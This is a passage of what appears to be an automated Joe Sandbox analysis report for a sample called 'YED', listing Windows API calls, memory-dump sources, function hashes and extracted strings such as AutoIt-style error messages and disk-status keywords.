                                                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00228BBA,00000000,?), ref: 002669A1
                                                                                                                                                • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00228BBA,00000000,?), ref: 002669B8
                                                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00228BBA,00000000), ref: 002669D4
                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 002669E6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 641708696-0
                                                                                                                                                • Opcode ID: fe01b9f0cadbeed4ce92558e606e1c23a4133798bcf6c5dcb7a376a3875b7e95
                                                                                                                                                • Instruction ID: 90eda7af4b3af96fe22a91ad7a20867d7a2bddae8b0170e20e695a7c9281ff81
                                                                                                                                                • Opcode Fuzzy Hash: fe01b9f0cadbeed4ce92558e606e1c23a4133798bcf6c5dcb7a376a3875b7e95
                                                                                                                                                • Instruction Fuzzy Hash: 1B617F31522661EFDB299F54FA4CB29B7F1FB41312F144529E0429A560CB75EDB0CFA0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00229944: GetWindowLongW.USER32(?,000000EB), ref: 00229952
                                                                                                                                                • GetSysColor.USER32 ref: 00229862
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ColorLongWindow
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 259745315-0
                                                                                                                                                • Opcode ID: a23268133f27a1e2e0aac2ab4c1245cea4d073043dea143514aaac04e57d9909
                                                                                                                                                • Instruction ID: 1a7961e444507467cbd76f4cc6b4558949f14fdeba1eb1152a4e7f53fb727a5e
                                                                                                                                                • Opcode Fuzzy Hash: a23268133f27a1e2e0aac2ab4c1245cea4d073043dea143514aaac04e57d9909
                                                                                                                                                • Instruction Fuzzy Hash: 0E41F531510650AFDB205F78BC88BB93BA5EB17330F284655F9A6872E1CB319CE2DB11
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0025F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00279717
                                                                                                                                                • LoadStringW.USER32(00000000,?,0025F7F8,00000001), ref: 00279720
                                                                                                                                                  • Part of subcall function 00219CB3: _wcslen.LIBCMT ref: 00219CBD
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0025F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00279742
                                                                                                                                                • LoadStringW.USER32(00000000,?,0025F7F8,00000001), ref: 00279745
                                                                                                                                                • MessageBoxW.USER32 ref: 00279866
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                • API String ID: 747408836-2268648507
                                                                                                                                                • Opcode ID: f9cbabb092f1c7ee49cd23ba8b68f36ba8f0975222fa8eeebee9e275d44a95ed
                                                                                                                                                • Instruction ID: 57985ab4af3e3b21ffe2f0b915dc736f6de9357e06415407fa6934a1bd768651
                                                                                                                                                • Opcode Fuzzy Hash: f9cbabb092f1c7ee49cd23ba8b68f36ba8f0975222fa8eeebee9e275d44a95ed
                                                                                                                                                • Instruction Fuzzy Hash: 4C414172810219ABDB14EBE0DD56DEEB3B9AF25340F104065F60572092EB756FE8CFA1
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00216B57: _wcslen.LIBCMT ref: 00216B6A
                                                                                                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 002707A2
                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 002707BE
                                                                                                                                                • RegOpenKeyExW.ADVAPI32 ref: 002707DA
                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 00270804
                                                                                                                                                • CLSIDFromString.OLE32(?,000001FE), ref: 0027082C
                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00270837
                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0027083C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                • API String ID: 323675364-22481851
                                                                                                                                                • Opcode ID: 6e5ed620a0281cbc3f83e64e8de277c39e75c18433626e7f70a89e2ee4ab9a94
                                                                                                                                                • Instruction ID: a9fc7106480c6c2ebc5a79808b1163c4ad569c989b49c44e45f7b1ff1245cb73
                                                                                                                                                • Opcode Fuzzy Hash: 6e5ed620a0281cbc3f83e64e8de277c39e75c18433626e7f70a89e2ee4ab9a94
                                                                                                                                                • Instruction Fuzzy Hash: 18411A71C20229EBDF15EF94DC958EDB7B8BF14350B144166E905A3160EB705E98CF90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 002A5504
                                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002A5515
                                                                                                                                                • CharNextW.USER32(00000158), ref: 002A5544
                                                                                                                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 002A5585
                                                                                                                                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 002A559B
                                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002A55AC
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$CharNext
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1350042424-0
                                                                                                                                                • Opcode ID: cb1194069ff1ce5677b8786dd5fcaffa54bc7907f063ee026bf3f7427ca50ecb
                                                                                                                                                • Instruction ID: 1459b404b88d5c3c8dd8c0561917ff488526bb09532fa88e943a80ba97357adf
                                                                                                                                                • Opcode Fuzzy Hash: cb1194069ff1ce5677b8786dd5fcaffa54bc7907f063ee026bf3f7427ca50ecb
                                                                                                                                                • Instruction Fuzzy Hash: 8F616D3192462AEBDF10DF54DC849FF7BB9FB0B720F104145F525AA290DB748AA0DBA0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • WSAStartup.WSOCK32(00000101,?), ref: 002905BC
                                                                                                                                                • inet_addr.WSOCK32(?), ref: 0029061C
                                                                                                                                                • gethostbyname.WSOCK32(?), ref: 00290628
                                                                                                                                                • IcmpCreateFile.IPHLPAPI ref: 00290636
                                                                                                                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 002906C6
                                                                                                                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 002906E5
                                                                                                                                                • IcmpCloseHandle.IPHLPAPI(?), ref: 002907B9
                                                                                                                                                • WSACleanup.WSOCK32 ref: 002907BF
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                • String ID: Ping
                                                                                                                                                • API String ID: 1028309954-2246546115
                                                                                                                                                • Opcode ID: 8c254f820440eaf3121f6c1207a2a1320752c817b02bc3af2413c513e8c790b3
                                                                                                                                                • Instruction ID: c6536c9da98d8ccc89ed3e472faf70285106499003cccc57501644e57b1f05b6
                                                                                                                                                • Opcode Fuzzy Hash: 8c254f820440eaf3121f6c1207a2a1320752c817b02bc3af2413c513e8c790b3
                                                                                                                                                • Instruction Fuzzy Hash: 7B919E35614202AFDB20CF55D4C8F5ABBE4BF44328F1585A9E4698B6A2C770EC91CF91
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcslen$BuffCharLower
                                                                                                                                                • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                • API String ID: 707087890-567219261
                                                                                                                                                • Opcode ID: 722097796cbcd356d7932a81e7365501c4a0b47ae5a592cc909d343c4b3e2db2
                                                                                                                                                • Instruction ID: 037b911ad17cb9d9222c1475ed8b5f26a07ee5ee7c6b0538cc1b382d152f2a07
                                                                                                                                                • Opcode Fuzzy Hash: 722097796cbcd356d7932a81e7365501c4a0b47ae5a592cc909d343c4b3e2db2
                                                                                                                                                • Instruction Fuzzy Hash: 7D51B031A201179BCF14DF68C8509BEB3A5BF66720B294229F466E72C4EB31DD60CBD0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CoInitialize.OLE32 ref: 00293774
                                                                                                                                                • CoUninitialize.OLE32 ref: 0029377F
                                                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000017,002AFB78,?), ref: 002937D9
                                                                                                                                                • IIDFromString.OLE32(?,?), ref: 0029384C
                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 002938E4
                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00293936
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                • API String ID: 636576611-1287834457
                                                                                                                                                • Opcode ID: e29dbfd49b9ed7c12a3d918e9be67643a12312f7a1cdd750af4154ab85eed29d
                                                                                                                                                • Instruction ID: d717d66a841554e87756c1a7869688efcd0f4402df6de1156c26f5a196b27368
                                                                                                                                                • Opcode Fuzzy Hash: e29dbfd49b9ed7c12a3d918e9be67643a12312f7a1cdd750af4154ab85eed29d
                                                                                                                                                • Instruction Fuzzy Hash: 8461AF70628301AFD711DF54D888BAABBE8FF49714F104819F9859B291D770EE58CB92
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetLocalTime.KERNEL32(?), ref: 00288257
                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00288267
                                                                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00288273
                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00288310
                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00288324
                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00288356
                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0028838C
                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00288395
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                • String ID: *.*
                                                                                                                                                • API String ID: 1464919966-438819550
                                                                                                                                                • Opcode ID: b286847d7fc5135ec358afc61ead52976c4592fba277458fb64505180d8f8e8c
                                                                                                                                                • Instruction ID: d7ab884ca754347354850512266e8b9d9c2afa675557839a7367c8dae3a85a12
                                                                                                                                                • Opcode Fuzzy Hash: b286847d7fc5135ec358afc61ead52976c4592fba277458fb64505180d8f8e8c
                                                                                                                                                • Instruction Fuzzy Hash: FF61ACB65243459FCB10EF20C8449AEB3E8FF89310F44885EF98983251EB31E965CF92
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 002833CF
                                                                                                                                                  • Part of subcall function 00219CB3: _wcslen.LIBCMT ref: 00219CBD
                                                                                                                                                • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 002833F0
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: LoadString$_wcslen
                                                                                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                                                • API String ID: 4099089115-3080491070
                                                                                                                                                • Opcode ID: acf6c157e56cf00d6891a11e38c8e5d7521bd192c73c430dd84b99d7f52ed637
                                                                                                                                                • Instruction ID: 7a02e557a159019539d17d5e009abb0abdb79197739e1d24d2116955073dfdcd
                                                                                                                                                • Opcode Fuzzy Hash: acf6c157e56cf00d6891a11e38c8e5d7521bd192c73c430dd84b99d7f52ed637
                                                                                                                                                • Instruction Fuzzy Hash: 49518F71920209AADF14EBA0DD46EEEB3B9AF19740F104066F50572192EB352FF8DF60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00229BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00229BB2
                                                                                                                                                  • Part of subcall function 0022912D: GetCursorPos.USER32(?), ref: 00229141
                                                                                                                                                  • Part of subcall function 0022912D: ScreenToClient.USER32(00000000,?), ref: 0022915E
                                                                                                                                                  • Part of subcall function 0022912D: GetAsyncKeyState.USER32 ref: 00229183
                                                                                                                                                  • Part of subcall function 0022912D: GetAsyncKeyState.USER32 ref: 0022919D
                                                                                                                                                • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 002A8B6B
                                                                                                                                                • ImageList_EndDrag.COMCTL32 ref: 002A8B71
                                                                                                                                                • ReleaseCapture.USER32 ref: 002A8B77
                                                                                                                                                • SetWindowTextW.USER32 ref: 002A8C12
                                                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 002A8C25
                                                                                                                                                • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 002A8CFF
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID$p#.
                                                                                                                                                • API String ID: 1924731296-2689671650
                                                                                                                                                • Opcode ID: 3c823962be045484e8104ca0f13efb6533a6adc350193064e1f691c82f2172df
                                                                                                                                                • Instruction ID: 899198900a54dcbeedb9b95ae23a067bf29cc2c76dfe69138db9cd04767e333d
                                                                                                                                                • Opcode Fuzzy Hash: 3c823962be045484e8104ca0f13efb6533a6adc350193064e1f691c82f2172df
                                                                                                                                                • Instruction Fuzzy Hash: 3251AC71114340AFD704DF10EC99FAA77E5FB89710F40062AF996672A2CB709964CF62
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcslen$BuffCharUpper
                                                                                                                                                • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                                                • API String ID: 1256254125-769500911
                                                                                                                                                • Opcode ID: 7575b85b4969c2e14e6ce92ae128cea8eacab0111fd8dae11d4108fdf1b47140
                                                                                                                                                • Instruction ID: 5f233d3c2ea88e929d337c17eda6a6e11e4d5aaa1d3c3f12468195d37af15a30
                                                                                                                                                • Opcode Fuzzy Hash: 7575b85b4969c2e14e6ce92ae128cea8eacab0111fd8dae11d4108fdf1b47140
                                                                                                                                                • Instruction Fuzzy Hash: 3E41EC32A200279BCB116F7DC8907BEB7A9FF61754B248129E629D7284E735CDA1C790
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 002853A0
                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00285416
                                                                                                                                                • GetLastError.KERNEL32 ref: 00285420
                                                                                                                                                • SetErrorMode.KERNEL32(00000000,READY), ref: 002854A7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                • API String ID: 4194297153-14809454
